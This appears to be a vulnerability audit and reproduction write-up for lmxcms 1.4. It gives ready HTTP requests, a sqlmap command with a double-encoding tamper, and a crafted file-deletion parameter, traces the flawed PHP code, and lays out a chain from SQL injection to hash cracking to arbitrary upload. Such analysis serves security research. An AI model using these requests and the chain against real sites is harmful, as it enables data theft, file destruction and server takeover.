lmxcms1.4 code auditing and vulnerability reproduction
lmxcms1.4 code auditing and vulnerability reproduction
1. There are loopholes
Front desk SQL injection, background arbitrary file deletion, arbitrary file upload
2. Exploit
2.1. Foreground SQL injection
GET http://192.168.164.138:81/index.php?m=tags&a=index&name=1 HTTP/1.1
Host: 192.168.164.138:81
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
sqlmap.py -r C:\12.txt --dbms mysql --technique=U -v3 --tamper=chardoubleencode --dbs -p name
2.2 Delete any files in the background
POST /admin.php?m=File&a=delete HTTP/1.1
Host: 192.168.164.138:81
Content-Length: 149
Cache-Control: max-age=0
Origin: http://192.168.164.138:81
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.164.138:81/admin.php?m=File&a=imageMain&type=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e16q1anmjcurape9ti1tviiro0
Connection: close
type=0&delImages=%E5%88%A0%E9%99%A4%E9%80%89%E4%B8%AD%E5%9B%BE%E7%89%87&fid%5B%5D=18%23%23%23%23%23%2Ffile%2Fcate%2F20200327%2F202003271601487709.jpg
Modify the fid parameters
2.3 Any file upload in the background
Basic settings in the background, modify the upload file type in the file settings, you can achieve any file upload
3. Vulnerability analysis
3.1 foreground SQL injection
\c\index\TagsAction.class.php
<?php
/**
* 【梦想cms】 http://www.lmxcms.com
*
* Tags控制器
*/
defined('LMXCMS') or exit();
class TagsAction extends HomeAction{
private $data;
private $tagsModel = null;
public function __construct() {
parent::__construct();
$data = p(2,1,1);
$name = string::delHtml($data['name']);
if(!$name) _404();
$name = urldecode($name);
if($this->tagsModel == null) $this->tagsModel = new TagsModel();
$this->data = $this->tagsModel->getNameData($name);
if(!$this->data) _404();
}
public function index(){
$temModel = new parse($this->smarty,$this->config);
echo $temModel->tags($this->data,$this->tagsModel);
}
}
?>
Track p function and delhtml function
function p($type=1,$pe=false,$sql=false,$mysql=false){
if($type == 1){
$data = $_POST;
}else if($type == 2){
$data = $_GET;
}else{
$data = $type;
}
if($sql) filter_sql($data);
if($mysql) mysql_retain($data);
foreach($data as $k => $v){
if(is_array($v)){
$newdata[$k] = p($v,$pe,$sql,$mysql);
}else{
if($pe){
$newdata[$k] = string::addslashes($v);
}else{
$newdata[$k] = trim($v);
}
}
}
return $newdata;
}
//去掉html标签
public static function delHtml($str){
return strip_tags($str);
}
It is found that the incoming parameters first pass the p function to check the keywords, and then execute the sql statement after decoding through the delhtml function and url,
There are two bypass methods, one is to directly perform URL encoding on the parameter twice to bypass, and the other method is to URL encode the%, after 252527 after two URL decoding is' For filtered keywords Using the strip_tags function, you can add <> in the keyword to bypass, here we use the bypass script that comes with sqlmap to filter.
3.2 Delete any files in the background
Since the incoming data is not filtered globally, in \ c \ admin \ FileAction.class.php
<?php
/**
* 【梦想cms】 http://www.lmxcms.com
*
* 文件管理控制器
*/
class FileAction extends AdminAction{
private $type; //图片 or 文件
private $fileModel = null;
public function __construct() {
parent::__construct();
$this->type = (int)$_POST['type'] ? (int)$_POST['type'] : (int)$_GET['type'];
if($this->fileModel == null) $this->fileModel = new FileModel();
}
//列表
public function index(){
$count = $this->fileModel->count($this->type);
$page = new page($count,20);
$data = $this->fileModel->getData($this->type,$page->returnLimit());
$this->smarty->assign('num',$count);
$this->smarty->assign('page',$page->html());
$this->smarty->assign('file',$data);
if($this->type){
$this->smarty->display('File/file.html');
}else{
$this->smarty->display('File/image.html');
}
}
//删除
public function delete(){
if(!$_POST['fid']) rewrite::js_back('请选择要删除的文件');
$this->fileModel->delete($_POST);
addlog('删除文件、图片');
rewrite::succ('删除成功');
}
}
?>
Trace delete function
public function delete($data){
$param['where'][] = 'type='.$data['type'];
foreach($data['fid'] as $k => $v){
$fileInfo = explode('#####',$v);
$fid[] = $fileInfo[0];
$path[] = trim($fileInfo[1],'/');
}
$fid = implode(',',$fid);
$param['where'][] = 'fid in('.$fid.')';
if(parent::deleteModel($param)){
//删除文件
foreach($path as $v){
file::unLink(ROOT_PATH.$v);
}
}
}
Without filtering the incoming parameters, you can delete any file
4. Use chain
First of all, we can use the SQL injection at the front desk to get the administrator password hash
However, the administrator password is encrypted,
//管理员密码加密
public static function pwdmd5($str){
return md5(sha1($str.$GLOBALS['public']['user_pwd_key']));
}
You can get the password after blasting,
Then use any file upload to complete the entire utilization chain
